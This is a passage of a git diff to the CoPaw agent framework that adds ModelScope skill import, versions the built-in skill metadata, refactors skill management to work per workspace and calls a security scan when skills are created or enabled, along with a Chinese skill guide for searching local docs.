+  find "$DOC_DIR" -type f -name "*.md" | head -n 100
+else
+  # 如果推导路径不对,执行全局模糊搜索
+  find "$COPAW_ROOT" -type d -name "docs" | grep "website/public/docs"
+fi
+```
+
+**如果项目文档不存在,搜索工作目录**
+
+如果还是找不到文档,搜索 copaw 安装路径下的可用文档内容:
+
+```bash
+# 寻找 faq.en.md 或 config.zh.md 等特征文件
+FILE_PATH=$(find . -type f -name "faq.en.md" -o -name "config.zh.md" | head -n 1)
+if [ -n "$FILE_PATH" ]; then
+  # 使用 dirname 获取该文件所在的目录
+  DOC_DIR=$(dirname "$FILE_PATH")
+fi
+```
+
+如果找到了文档目录,请你记录在 memory 中,格式为:
+
+```markdown
+# 文档目录
+$DOC_DIR = <路径>
+```
+
+### 第二步:文档检索与匹配
+
+文档文件命名格式为 `<名称>.<语言>.md`(如 `config.zh.md`、`config.en.md`、`quickstart.zh.md`)。
+
+使用 find 命令在目标目录中列出所有符合后缀的文档,并根据文件名关键字(如 install、env、setup)锁定目标文档。
+
+```bash
+# 列出所有符合后缀的文档
+find $DOC_DIR -type f -name "*.md"
+```
+
+如果没有合适的文档,则在下一步阅读所有文档内容。
+
+### 第三步:阅读文档内容
+
+找到候选文档后,读取并确认与问题相关的段落。可使用:
+
+- `cat <文件路径>`
+- `file_reader` skill(推荐用于更长文档或分段读取)
+
+如果文档很长,优先读取和问题最相关的章节(安装步骤、配置项、示例命令、注意事项、版本要求)。
+
+### 第四步:提取信息并作答
+
+从文档中提取关键信息,组织成可执行答案:
+
+- 先给直接结论
+- 再给步骤/命令/配置示例
+- 补充必要前置条件与常见坑
+
+语言要求:回答语言必须与用户提问语言一致(中文问就中文答,英文问就英文答)。
+
+### 第五步(可选):官网检索
+
+若前面步骤无法完成(本地无文档、文档缺失、信息不足),使用官网作为兜底:
+
+- http://copaw.agentscope.io/
+
+基于官网可获得内容继续回答,并在答案中明确说明该结论来自官网文档。
+
+## 输出质量要求
+
+- 不编造不存在的配置项或命令
+- 遇到版本差异时,明确标注"需以当前文档版本为准"
+- 涉及路径、命令、配置键时,尽量给可复制的原文片段
+- 若信息仍不足,明确缺口并告诉用户还需要哪类信息(例如操作系统、安装方式、报错日志)
diff --git a/src/copaw/agents/skills/himalaya/SKILL.md b/src/copaw/agents/skills/himalaya/SKILL.md
index 92ba144ad..84075ebc1 100644
--- a/src/copaw/agents/skills/himalaya/SKILL.md
+++ b/src/copaw/agents/skills/himalaya/SKILL.md
@@ -4,6 +4,7 @@ description: "CLI to manage emails via IMAP/SMTP. Use `himalaya` to list, read,
 homepage: https://github.com/pimalaya/himalaya
 metadata:
   {
+    "builtin_skill_version": "1.0",
     "openclaw":
       {
         "emoji": "📧",
diff --git a/src/copaw/agents/skills/news/SKILL.md b/src/copaw/agents/skills/news/SKILL.md
index 4b3891b2f..ffe5f6a49 100644
--- a/src/copaw/agents/skills/news/SKILL.md
+++ b/src/copaw/agents/skills/news/SKILL.md
@@ -3,6 +3,7 @@ name: news
 description: "Look up the latest news for the user from specified news sites. Provides authoritative URLs for politics, finance, society, world, tech, sports, and entertainment. Use browser_use to open each URL and snapshot to get content, then summarize for the user."
 metadata:
   {
+    "builtin_skill_version": "1.0",
     "copaw":
       {
         "emoji": "📰",
diff --git a/src/copaw/agents/skills/pdf/SKILL.md b/src/copaw/agents/skills/pdf/SKILL.md
index 4a8a11e66..c199c1454 100644
--- a/src/copaw/agents/skills/pdf/SKILL.md
+++ b/src/copaw/agents/skills/pdf/SKILL.md
@@ -2,6 +2,7 @@
 name: pdf
 description: Use this skill whenever the user wants to do anything with PDF files. This includes reading or extracting text/tables from PDFs, combining or merging multiple PDFs into one, splitting PDFs apart, rotating pages, adding watermarks, creating new PDFs, filling PDF forms, encrypting/decrypting PDFs, extracting images, and OCR on scanned PDFs to make them searchable. If the user mentions a .pdf file or asks to produce one, use this skill.
 license: Proprietary. LICENSE.txt has complete terms
+metadata: { "builtin_skill_version": "1.0" }
 ---
 
 > **Important:** All `scripts/` paths are relative to this skill directory.
diff --git a/src/copaw/agents/skills/pptx/SKILL.md b/src/copaw/agents/skills/pptx/SKILL.md
index 61533146f..afdc21e8f 100644
--- a/src/copaw/agents/skills/pptx/SKILL.md
+++ b/src/copaw/agents/skills/pptx/SKILL.md
@@ -2,6 +2,7 @@
 name: pptx
 description: "Use this skill any time a .pptx file is involved in any way — as input, output, or both. This includes: creating slide decks, pitch decks, or presentations; reading, parsing, or extracting text from any .pptx file (even if the extracted content will be used elsewhere, like in an email or summary); editing, modifying, or updating existing presentations; combining or splitting slide files; working with templates, layouts, speaker notes, or comments. Trigger whenever the user mentions \"deck,\" \"slides,\" \"presentation,\" or references a .pptx filename, regardless of what they plan to do with the content afterward. If a .pptx file needs to be opened, created, or touched, use this skill."
 license: Proprietary. LICENSE.txt has complete terms
+metadata: { "builtin_skill_version": "1.0" }
 ---
 
 > **Important:** All `scripts/` paths are relative to this skill directory.
diff --git a/src/copaw/agents/skills/xlsx/SKILL.md b/src/copaw/agents/skills/xlsx/SKILL.md
index cd639c3d3..de1b093ec 100644
--- a/src/copaw/agents/skills/xlsx/SKILL.md
+++ b/src/copaw/agents/skills/xlsx/SKILL.md
@@ -2,6 +2,7 @@
 name: xlsx
 description: "Use this skill any time a spreadsheet file is the primary input or output. This means any task where the user wants to: open, read, edit, or fix an existing .xlsx, .xlsm, .csv, or .tsv file (e.g., adding columns, computing formulas, formatting, charting, cleaning messy data); create a new spreadsheet from scratch or from other data sources; or convert between tabular file formats. Trigger especially when the user references a spreadsheet file by name or path — even casually (like \"the xlsx in my downloads\") — and wants something done to it or produced from it. Also trigger for cleaning or restructuring messy tabular data files (malformed rows, misplaced headers, junk data) into proper spreadsheets. The deliverable must be a spreadsheet file. Do NOT trigger when the primary deliverable is a Word document, HTML report, standalone Python script, database pipeline, or Google Sheets API integration, even if tabular data is involved."
 license: Proprietary. LICENSE.txt has complete terms
+metadata: { "builtin_skill_version": "1.0" }
 ---
 
 > **Important:** All `scripts/` paths are relative to this skill directory.
diff --git a/src/copaw/agents/skills_hub.py b/src/copaw/agents/skills_hub.py
index ba81e7851..255e8a231 100644
--- a/src/copaw/agents/skills_hub.py
+++ b/src/copaw/agents/skills_hub.py
@@ -11,8 +11,9 @@
 import io
 import zipfile
 from dataclasses import dataclass
+from pathlib import Path
 from typing import Any
-from urllib.parse import urlencode, urlparse, unquote
+from urllib.parse import quote, urlencode, urlparse, unquote
 from urllib.error import HTTPError, URLError
 from urllib.request import Request, urlopen
@@ -705,6 +706,38 @@ def _extract_lobehub_identifier(url: str) -> str:
     return ""
 
 
+def _extract_modelscope_skill_spec(
+    url: str,
+) -> tuple[str, str, str] | None:
+    """
+    Parse ModelScope skills URL into (owner, skill_name, version_hint).
+    """
+    parsed = urlparse(url)
+    host = (parsed.netloc or "").lower()
+    if host not in {"modelscope.cn", "www.modelscope.cn"}:
+        return None
+    parts = [unquote(p) for p in parsed.path.split("/") if p]
+    if len(parts) < 3 or parts[0] != "skills":
+        return None
+
+    owner_part = parts[1].strip()
+    skill_name = parts[2].strip()
+    if not owner_part or not skill_name:
+        return None
+    owner = owner_part[1:] if owner_part.startswith("@") else owner_part
+    owner = owner.strip()
+    if not owner:
+        return None
+
+    version_hint = ""
+    if len(parts) >= 6 and parts[3] == "archive" and parts[4] == "zip":
+        archive_name = parts[5].strip()
+        if archive_name.endswith(".zip"):
+            archive_name = archive_name[: -len(".zip")]
+        version_hint = archive_name
+    return owner, skill_name, version_hint
+
+
 def _extract_github_spec(
     url: str,
 ) -> tuple[str, str, str, str] | None:
@@ -796,6 +829,13 @@ def _github_api_url(owner: str, repo: str, suffix: str) -> str:
     return f"{base}/{cleaned}" if cleaned else base
 
 
+def _github_encode_path(path: str) -> str:
+    cleaned = path.strip("/")
+    if not cleaned:
+        return ""
+    return quote(cleaned, safe="/")
+
+
 def _github_get_default_branch(owner: str, repo: str) -> str:
     repo_meta = _http_json_get(_github_api_url(owner, repo, ""))
     if isinstance(repo_meta, dict):
@@ -855,7 +895,8 @@ def _github_get_content_entry(
     path: str,
     ref: str,
 ) -> dict[str, Any]:
-    content_url = _github_api_url(owner, repo, f"contents/{path}")
+    encoded_path = _github_encode_path(path)
+    content_url = _github_api_url(owner, repo, f"contents/{encoded_path}")
     data = _http_json_get(content_url, {"ref": ref})
     if not isinstance(data, dict):
         raise ValueError(f"Unexpected GitHub response for path: {path}")
@@ -868,7 +909,9 @@ def _github_get_dir_entries(
     path: str,
     ref: str,
 ) -> list[dict[str, Any]]:
-    content_url = _github_api_url(owner, repo, f"contents/{path}")
+    encoded_path = _github_encode_path(path)
+    suffix = "contents" if not encoded_path else f"contents/{encoded_path}"
+    content_url = _github_api_url(owner, repo, suffix)
     data = _http_json_get(content_url, {"ref": ref})
     if isinstance(data, list):
         return [x for x in data if isinstance(x, dict)]
@@ -914,15 +957,15 @@ def _github_collect_tree_files(
     repo: str,
     ref: str,
     root: str,
-    subdir: str,
     max_files: int = 200,
 ) -> dict[str, str]:
     files: dict[str, str] = {}
-    pending = [_join_repo_path(root, subdir)]
+    pending = [root] if root else [""]
     visited = 0
     while pending:
         current_dir = pending.pop()
-        entries = _github_get_dir_entries(owner, repo, current_dir, ref)
+        target_dir = current_dir or ""
+        entries = _github_get_dir_entries(owner, repo, target_dir, ref)
         for entry in entries:
             entry_type = str(entry.get("type") or "")
             entry_path = str(entry.get("path") or "")
@@ -934,10 +977,6 @@ def _github_collect_tree_files(
             if entry_type != "file":
                 continue
             rel = _relative_from_root(entry_path, root)
-            if not (
-                rel.startswith("references/") or rel.startswith("scripts/")
-            ):
-                continue
             files[rel] = _github_read_file(entry)
             visited += 1
             if visited >= max_files:
@@ -1038,20 +1077,14 @@ def _fetch_bundle_from_skills_sh_url(
     )
 
     files: dict[str, str] = {"SKILL.md": _github_read_file(skill_md_entry)}
-    for subdir in ("references", "scripts"):
-        try:
-            files.update(
-                _github_collect_tree_files(
-                    owner=owner,
-                    repo=repo,
-                    ref=branch,
-                    root=selected_root,
-                    subdir=subdir,
-                ),
-            )
-        except HTTPError as e:
-            if getattr(e, "code", 0) != 404:
-                raise
+    files.update(
+        _github_collect_tree_files(
+            owner=owner,
+            repo=repo,
+            ref=branch,
+            root=selected_root,
+        ),
+    )
 
     source_url = f"https://github.com/{owner}/{repo}"
     return {"name": skill, "files": files}, source_url
@@ -1148,20 +1181,14 @@ def _fetch_bundle_from_repo_and_skill_hint(
     )
 
     files: dict[str, str] = {"SKILL.md": _github_read_file(skill_md_entry)}
-    for subdir in ("references", "scripts"):
-        try:
-            files.update(
-                _github_collect_tree_files(
-                    owner=owner,
-                    repo=repo,
-                    ref=branch,
-                    root=selected_root,
-                    subdir=subdir,
-                ),
-            )
-        except HTTPError as e:
-            if getattr(e, "code", 0) != 404:
-                raise
+    files.update(
+        _github_collect_tree_files(
+            owner=owner,
+            repo=repo,
+            ref=branch,
+            root=selected_root,
+        ),
+    )
 
     source_url = f"https://github.com/{owner}/{repo}"
     skill_name = skill.split("/")[-1].strip() if skill else repo
     return {"name": skill_name or repo, "files": files}, source_url
@@ -1275,6 +1302,73 @@ def _lobehub_zip_to_bundle(identifier: str, payload: bytes) -> dict[str, Any]:
     return {"name": skill_name.strip(), "files": files}
 
 
+def _fetch_bundle_from_modelscope_url(
+    bundle_url: str,
+    requested_version: str,
+) -> tuple[Any, str]:
+    spec = _extract_modelscope_skill_spec(bundle_url)
+    if spec is None:
+        raise ValueError(
+            "Invalid ModelScope URL format. Use URL like "
+            "https://modelscope.cn/skills/@owner/skill-name",
+        )
+    owner, skill_name, version_hint = spec
+    detail_url = f"https://modelscope.cn/api/v1/skills/@{owner}/{skill_name}"
+    try:
+        detail = _http_json_get(detail_url)
+    except HTTPError as e:
+        raise ValueError(
+            "ModelScope skill lookup failed: "
+            f"{_lobehub_http_error_message(e)}",
+        ) from e
+
+    payload = detail.get("Data") if isinstance(detail, dict) else None
+    if not isinstance(payload, dict):
+        payload = {}
+    source_url = payload.get("SourceURL")
+    source_url = source_url.strip() if isinstance(source_url, str) else ""
+    source_lower = source_url.lower()
+    preferred_version = requested_version.strip() or version_hint
+
+    if source_url and _is_http_url(source_url):
+        if "github.com" in source_lower:
+            bundle, _ = _fetch_bundle_from_github_url(
+                source_url,
+                preferred_version,
+            )
+            return bundle, bundle_url
+        if "clawhub.ai" in source_lower:
+            clawhub_slug = _resolve_clawhub_slug(source_url)
+            if clawhub_slug:
+                try:
+                    bundle, _ = _fetch_bundle_from_clawhub_slug(
+                        clawhub_slug,
+                        preferred_version,
+                    )
+                    return bundle, bundle_url
+                except Exception as e:
+                    logger.warning(
+                        "ModelScope source clawhub fetch failed for %s: %s",
+                        source_url,
+                        e,
+                    )
+
+    readme_content = payload.get("ReadMeContent")
+    if isinstance(readme_content, str) and readme_content.strip():
+        fallback_name = (
+            str(payload.get("Name") or skill_name).strip() or skill_name
+        )
+        return {
+            "name": fallback_name,
+            "files": {"SKILL.md": readme_content},
+        }, bundle_url
+
+    raise ValueError(
+        "ModelScope skill source is unsupported and ReadMeContent is empty.
" + "Please import from the original source URL directly.", + ) + + def _fetch_bundle_from_lobehub_url( bundle_url: str, requested_version: str, @@ -1364,58 +1458,45 @@ def search_hub_skills(query: str, limit: int = 20) -> list[HubSkillResult]: return results +def _resolve_bundle_from_url( + bundle_url: str, + version: str, +) -> tuple[Any, str]: + fetcher: Any | None = None + clawhub_slug = "" + if _extract_skills_sh_spec(bundle_url) is not None: + fetcher = _fetch_bundle_from_skills_sh_url + elif _extract_github_spec(bundle_url) is not None: + fetcher = _fetch_bundle_from_github_url + elif _extract_lobehub_identifier(bundle_url): + fetcher = _fetch_bundle_from_lobehub_url + elif _extract_modelscope_skill_spec(bundle_url) is not None: + fetcher = _fetch_bundle_from_modelscope_url + elif _extract_skillsmp_slug(bundle_url): + fetcher = _fetch_bundle_from_skillsmp_url + else: + clawhub_slug = _resolve_clawhub_slug(bundle_url) + + if fetcher is not None: + return fetcher(bundle_url, requested_version=version) + if clawhub_slug: + return _fetch_bundle_from_clawhub_slug(clawhub_slug, version) + # Backward-compatible fallback for direct bundle JSON URLs. 
+ return _http_json_get(bundle_url), bundle_url + + # pylint: disable-next=too-many-branches def install_skill_from_hub( *, + workspace_dir: Path, bundle_url: str, version: str = "", enable: bool = True, overwrite: bool = False, ) -> HubInstallResult: - source_url = bundle_url - data: Any - if not bundle_url or not _is_http_url(bundle_url): raise ValueError("bundle_url must be a valid http(s) URL") - - skills_spec = _extract_skills_sh_spec(bundle_url) - if skills_spec is not None: - data, source_url = _fetch_bundle_from_skills_sh_url( - bundle_url, - requested_version=version, - ) - else: - github_spec = _extract_github_spec(bundle_url) - if github_spec is not None: - data, source_url = _fetch_bundle_from_github_url( - bundle_url, - requested_version=version, - ) - else: - lobehub_identifier = _extract_lobehub_identifier(bundle_url) - if lobehub_identifier: - data, source_url = _fetch_bundle_from_lobehub_url( - bundle_url, - requested_version=version, - ) - else: - skillsmp_slug = _extract_skillsmp_slug(bundle_url) - if skillsmp_slug: - data, source_url = _fetch_bundle_from_skillsmp_url( - bundle_url, - requested_version=version, - ) - else: - clawhub_slug = _resolve_clawhub_slug(bundle_url) - if clawhub_slug: - data, source_url = _fetch_bundle_from_clawhub_slug( - clawhub_slug, - version, - ) - else: - # Backward-compatible fallback for direct bundle - # JSON URLs. - data = _http_json_get(bundle_url) + data, source_url = _resolve_bundle_from_url(bundle_url, version) name, content, references, scripts, extra_files = _normalize_bundle(data) if not name: @@ -1424,7 +1505,8 @@ def install_skill_from_hub( # Sanitize: "Excel / XLSX" etc. 
must not be used as dir name name = _sanitize_skill_dir_name(name) - created = SkillService.create_skill( + skill_service = SkillService(workspace_dir) + created = skill_service.create_skill( name=name, content=content, overwrite=overwrite, @@ -1440,7 +1522,7 @@ def install_skill_from_hub( enabled = False if enable: - enabled = SkillService.enable_skill(name, force=True) + enabled = skill_service.enable_skill(name, force=True) if not enabled: logger.warning("Skill '%s' imported but enable failed", name) diff --git a/src/copaw/agents/skills_manager.py b/src/copaw/agents/skills_manager.py index 76ba47d81..396c2f422 100644 --- a/src/copaw/agents/skills_manager.py +++ b/src/copaw/agents/skills_manager.py @@ -1,100 +1,18 @@ # -*- coding: utf-8 -*- """Skills management: sync skills from code to working_dir.""" -import filecmp import logging import shutil -from collections.abc import Iterable -from itertools import zip_longest from pathlib import Path from typing import Any from pydantic import BaseModel import frontmatter +from packaging.version import Version -from ..constant import ACTIVE_SKILLS_DIR, CUSTOMIZED_SKILLS_DIR logger = logging.getLogger(__name__) -IGNORED_RUNTIME_ARTIFACT_NAMES = { - "__pycache__", - ".DS_Store", - "Thumbs.db", - ".pytest_cache", -} -IGNORED_RUNTIME_ARTIFACT_SUFFIXES = { - ".pyc", - ".pyo", -} - - -def _should_ignore_runtime_artifact(path: Path) -> bool: - """Return True for generated runtime files that should not sync.""" - if path.name in IGNORED_RUNTIME_ARTIFACT_NAMES: - return True - if path.is_file() and path.suffix in IGNORED_RUNTIME_ARTIFACT_SUFFIXES: - return True - return False - - -def _iter_relevant_directory_entries( - directory: Path, -) -> Iterable[tuple[Path, Path]]: - """Yield relative paths for non-generated files and directories.""" - if not directory.exists(): - return - - yield from _iter_relevant_directory_entries_from( - root_dir=directory, - current_dir=directory, - ) - - -def _iter_relevant_directory_entries_from( - 
root_dir: Path,
-    current_dir: Path,
-) -> Iterable[tuple[Path, Path]]:
-    """Yield sorted non-generated directory entries without buffering."""
-    for item in sorted(current_dir.iterdir(), key=lambda path: path.name):
-        if _should_ignore_runtime_artifact(item):
-            continue
-
-        yield item.relative_to(root_dir), item
-
-        if item.is_dir():
-            yield from _iter_relevant_directory_entries_from(
-                root_dir=root_dir,
-                current_dir=item,
-            )
-
-
-def _directories_match_ignoring_runtime_artifacts(
-    dir1: Path,
-    dir2: Path,
-) -> bool:
-    """Compare two directories while ignoring generated runtime artifacts."""
-    if not dir1.exists() or not dir2.exists():
-        return False
-
-    for entry1, entry2 in zip_longest(
-        _iter_relevant_directory_entries(dir1),
-        _iter_relevant_directory_entries(dir2),
-    ):
-        if entry1 is None or entry2 is None:
-            return False
-
-        relative_path1, left = entry1
-        relative_path2, right = entry2
-        if relative_path1 != relative_path2:
-            return False
-        if left.is_dir() != right.is_dir():
-            return False
-        if left.is_file() and not filecmp.cmp(left, right, shallow=False):
-            return False
-
-    return True
-
-
 def _dedupe_skills_by_name(skills: list["SkillInfo"]) -> list["SkillInfo"]:
     """Return one skill per name, preferring customized over builtin."""
     merged: dict[str, SkillInfo] = {}
@@ -143,23 +61,23 @@ def get_builtin_skills_dir() -> Path:
     return Path(__file__).parent / "skills"
 
 
-def get_customized_skills_dir() -> Path:
-    """Get the path to customized skills directory in working_dir."""
-    return CUSTOMIZED_SKILLS_DIR
+def get_customized_skills_dir(workspace_dir: Path) -> Path:
+    """Get the path to customized skills directory in workspace_dir."""
+    return workspace_dir / "customized_skills"
 
 
-def get_active_skills_dir() -> Path:
-    """Get the path to active skills directory in working_dir."""
-    return ACTIVE_SKILLS_DIR
+def get_active_skills_dir(workspace_dir: Path) -> Path:
+    """Get the path to active skills directory in workspace_dir."""
+    return workspace_dir / "active_skills"
 
 
-def get_working_skills_dir() -> Path:
+def get_working_skills_dir(workspace_dir: Path) -> Path:
     """
-    Get the path to skills directory in working_dir.
+    Get the path to skills directory in workspace_dir.
 
     Deprecated: Use get_active_skills_dir() instead.
     """
-    return get_active_skills_dir()
+    return get_active_skills_dir(workspace_dir)
 
 
 def _build_directory_tree(directory: Path) -> dict[str, Any]:
@@ -217,7 +135,46 @@ def _collect_skills_from_dir(directory: Path) -> dict[str, Path]:
     return skills
 
 
+def sync_skill_dir_to_active(
+    workspace_dir: Path,
+    skill_dir: Path,
+    force: bool = False,
+) -> bool:
+    """Sync a single skill directory into active_skills."""
+    skill_md = skill_dir / "SKILL.md"
+    if not skill_dir.is_dir() or not skill_md.exists():
+        logger.warning(
+            "Skill directory is invalid or missing SKILL.md: %s",
+            skill_dir,
+        )
+        return False
+
+    active_skills = get_active_skills_dir(workspace_dir)
+    active_skills.mkdir(parents=True, exist_ok=True)
+
+    target_dir = active_skills / skill_dir.name
+    if target_dir.exists():
+        if not force:
+            logger.debug(
+                "Skill '%s' already exists in active_skills, skipping.",
+                skill_dir.name,
+            )
+            return False
+        shutil.rmtree(target_dir)
+
+    try:
+        shutil.copytree(skill_dir, target_dir)
+        logger.debug("Synced skill '%s' to active_skills.", skill_dir.name)
+        return True
+    except Exception as e:
+        logger.error(
+            "Failed to sync skill directory '%s' to active_skills: %s",
+            skill_dir,
+            e,
+        )
+        return False
+
+
 def sync_skills_to_working_dir(
+    workspace_dir: Path,
     skill_names: list[str] | None = None,
     force: bool = False,
 ) -> tuple[int, int]:
@@ -225,6 +182,7 @@
     Sync skills from builtin and customized to active_skills directory.
 
     Args:
+        workspace_dir: Workspace directory path.
         skill_names: List of skill names to sync. If None, sync all skills.
         force: If True, overwrite existing skills in active_skills.
@@ -232,8 +190,8 @@ def sync_skills_to_working_dir(
         Tuple of (synced_count, skipped_count).
     """
     builtin_skills = get_builtin_skills_dir()
-    customized_skills = get_customized_skills_dir()
-    active_skills = get_active_skills_dir()
+    customized_skills = get_customized_skills_dir(workspace_dir)
+    active_skills = get_active_skills_dir(workspace_dir)
 
     # Ensure active skills directory exists
     active_skills.mkdir(parents=True, exist_ok=True)
@@ -264,51 +222,46 @@
     synced_count = 0
     skipped_count = 0
 
-    # Sync each skill
     for skill_name, skill_dir in skills_to_sync.items():
         target_dir = active_skills / skill_name
 
         if target_dir.exists() and not force:
             logger.debug(
                 "Skill '%s' already exists in active_skills, skipping. "
                 "Use force=True to overwrite.",
                 skill_name,
             )
             skipped_count += 1
             continue
 
-        # Copy skill directory
         try:
-            if target_dir.exists():
-                shutil.rmtree(target_dir)
-            shutil.copytree(skill_dir, target_dir)
-            logger.debug("Synced skill '%s' to active_skills.", skill_name)
-            synced_count += 1
+            if sync_skill_dir_to_active(workspace_dir, skill_dir, force=True):
+                synced_count += 1
+            else:
+                skipped_count += 1
         except Exception as e:
-            logger.error(
-                "Failed to sync skill '%s': %s",
-                skill_name,
-                e,
-            )
+            logger.error("Failed to sync skill '%s': %s", skill_name, e)
 
     return synced_count, skipped_count
 
 
 def sync_skills_from_active_to_customized(
+    workspace_dir: Path,
     skill_names: list[str] | None = None,
 ) -> tuple[int, int]:
     """
     Sync skills from active_skills to customized_skills directory.
 
     Args:
+        workspace_dir: Workspace directory path.
        skill_names: List of skill names to sync. If None, sync all skills.
 
     Returns:
         Tuple of (synced_count, skipped_count).
""" - active_skills = get_active_skills_dir() - customized_skills = get_customized_skills_dir() + active_skills = get_active_skills_dir(workspace_dir) + customized_skills = get_customized_skills_dir(workspace_dir) builtin_skills = get_builtin_skills_dir() customized_skills.mkdir(parents=True, exist_ok=True) @@ -327,23 +280,23 @@ def sync_skills_from_active_to_customized( if skill_names is not None and skill_name not in skill_names: continue - if skill_name in builtin_skills_dict: - builtin_skill_dir = builtin_skills_dict[skill_name] - if _directories_match_ignoring_runtime_artifacts( - skill_dir, - builtin_skill_dir, - ): - skipped_count += 1 - continue + # Skip builtin skills (dual check: version field + name match) + active_ver = _get_builtin_skill_version(skill_dir) + if active_ver is not None and skill_name in builtin_skills_dict: + skipped_count += 1 + continue + # Only back-sync when customized doesn't already exist target_dir = customized_skills / skill_name + if target_dir.exists(): + skipped_count += 1 + continue try: - if target_dir.exists(): - shutil.rmtree(target_dir) shutil.copytree(skill_dir, target_dir) logger.debug( - "Synced skill '%s' from active_skills to customized_skills.", + "Synced skill '%s' from active_skills to " + "customized_skills.", skill_name, ) synced_count += 1 @@ -357,14 +310,17 @@ def sync_skills_from_active_to_customized( return synced_count, skipped_count -def list_available_skills() -> list[str]: +def list_available_skills(workspace_dir: Path) -> list[str]: """ List all available skills in active_skills directory. + Args: + workspace_dir: Workspace directory path. + Returns: List of skill names. 
""" - active_skills = get_active_skills_dir() + active_skills = get_active_skills_dir(workspace_dir) if not active_skills.exists(): return [] @@ -376,16 +332,19 @@ def list_available_skills() -> list[str]: ] -def ensure_skills_initialized() -> None: +def ensure_skills_initialized(workspace_dir: Path) -> None: """ Check if skills are initialized in active_skills directory. + Args: + workspace_dir: Workspace directory path. + Logs a warning if no skills are found, or info about loaded skills. Skills should be configured via `copaw init` or `copaw skills config`. """ - active_skills = get_active_skills_dir() - available = list_available_skills() + active_skills = get_active_skills_dir(workspace_dir) + available = list_available_skills(workspace_dir) if not active_skills.exists() or not available: logger.warning( @@ -532,11 +491,25 @@ class SkillService: """ Service for managing skills. - Manages skills across builtin, customized, and active directories. + Manages skills across builtin, customized, and active directories + for a specific workspace. """ - @staticmethod - def list_all_skills() -> list[SkillInfo]: + def __init__(self, workspace_dir: Path): + """ + Initialize SkillService for a specific workspace. + + Args: + workspace_dir: Path to the workspace directory. + """ + self.workspace_dir = workspace_dir + + def get_customized_skill_dir(self, name: str) -> Path | None: + """Return the Path to a skill inside customized_skills, or None.""" + skill_dir = get_customized_skills_dir(self.workspace_dir) / name + return skill_dir if skill_dir.exists() else None + + def list_all_skills(self) -> list[SkillInfo]: """ List all skills from builtin and customized directories. @@ -544,15 +517,32 @@ def list_all_skills() -> list[SkillInfo]: List of SkillInfo with name, content, source, and path. 
""" try: - synced, _ = sync_skills_from_active_to_customized() + synced, _ = sync_skills_from_active_to_customized( + self.workspace_dir, + ) + if synced > 0: + logger.debug( + "Back-synced %d skill(s) from active_skills", + synced, + ) + except Exception as e: + logger.debug( + "Failed to back-sync skills: %s", + e, + ) + + try: + synced, _ = sync_skills_to_working_dir( + self.workspace_dir, + ) if synced > 0: logger.debug( - "Synced %d skill(s) from active_skills", + "Forward-synced %d skill(s) to active_skills", synced, ) except Exception as e: logger.debug( - "Failed to sync skills from active_skills: %s", + "Failed to forward-sync skills: %s", e, ) @@ -564,23 +554,28 @@ def list_all_skills() -> list[SkillInfo]: _read_skills_from_dir(get_builtin_skills_dir(), "builtin"), ) skills.extend( - _read_skills_from_dir(get_customized_skills_dir(), "customized"), + _read_skills_from_dir( + get_customized_skills_dir(self.workspace_dir), + "customized", + ), ) return _dedupe_skills_by_name(skills) - @staticmethod - def list_available_skills() -> list[SkillInfo]: + def list_available_skills(self) -> list[SkillInfo]: """ List all available (active) skills in active_skills directory. Returns: List of SkillInfo with name, content, source, and path. 
""" - return _read_skills_from_dir(get_active_skills_dir(), "active") + return _read_skills_from_dir( + get_active_skills_dir(self.workspace_dir), + "active", + ) - @staticmethod def create_skill( + self, name: str, content: str, overwrite: bool = False, @@ -657,7 +652,7 @@ def create_skill( ) return False - customized_dir = get_customized_skills_dir() + customized_dir = get_customized_skills_dir(self.workspace_dir) customized_dir.mkdir(parents=True, exist_ok=True) skill_dir = customized_dir / name @@ -709,9 +704,31 @@ def create_skill( name, ) + # --- Security scan (post-write) ---------------------------------- + try: + from ..security.skill_scanner import ( + SkillScanError, + scan_skill_directory, + ) + + scan_skill_directory(skill_dir, skill_name=name) + except SkillScanError: + raise + except Exception as scan_exc: + logger.warning( + "Security scan error for skill '%s' (non-fatal): %s", + name, + scan_exc, + ) + # --------------------------------------------------------------- + logger.debug("Created skill '%s' in customized_skills.", name) return True except Exception as e: + from ..security.skill_scanner import SkillScanError + + if isinstance(e, SkillScanError): + raise logger.error( "Failed to create skill '%s': %s", name, @@ -719,8 +736,7 @@ def create_skill( ) return False - @staticmethod - def disable_skill(name: str) -> bool: + def disable_skill(self, name: str) -> bool: """ Disable a skill by removing it from active_skills directory. @@ -730,7 +746,7 @@ def disable_skill(name: str) -> bool: Returns: True if skill was disabled successfully, False otherwise. 
""" - active_dir = get_active_skills_dir() + active_dir = get_active_skills_dir(self.workspace_dir) skill_dir = active_dir / name if not skill_dir.exists(): @@ -752,11 +768,14 @@ def disable_skill(name: str) -> bool: ) return False - @staticmethod - def enable_skill(name: str, force: bool = False) -> bool: + def enable_skill(self, name: str, force: bool = False) -> bool: """ Enable a skill by syncing it to active_skills directory. + Before syncing the skill runs through a security scan. + Blocking behaviour is controlled by the scanner mode in + config (``security.skill_scanner.mode``). + Args: name: Skill name to enable. force: If True, overwrite existing skill in active_skills. @@ -764,13 +783,41 @@ def enable_skill(name: str, force: bool = False) -> bool: Returns: True if skill was enabled successfully, False otherwise. """ - sync_skills_to_working_dir(skill_names=[name], force=force) + # --- Security scan (pre-activation) -------------------------------- + try: + from ..security.skill_scanner import ( + SkillScanError, + scan_skill_directory, + ) + + source_dir = self.get_customized_skill_dir(name) + if source_dir is None: + builtin = get_builtin_skills_dir() / name + if builtin.is_dir(): + source_dir = builtin + + if source_dir is not None: + scan_skill_directory(source_dir, skill_name=name) + except SkillScanError: + raise + except Exception as scan_exc: + logger.warning( + "Security scan error for skill '%s' (non-fatal): %s", + name, + scan_exc, + ) + # ------------------------------------------------------------------- + + sync_skills_to_working_dir( + self.workspace_dir, + skill_names=[name], + force=force, + ) # Check if skill was actually synced - active_dir = get_active_skills_dir() + active_dir = get_active_skills_dir(self.workspace_dir) return (active_dir / name).exists() - @staticmethod - def delete_skill(name: str) -> bool: + def delete_skill(self, name: str) -> bool: """ Delete a skill from customized_skills directory permanently. 
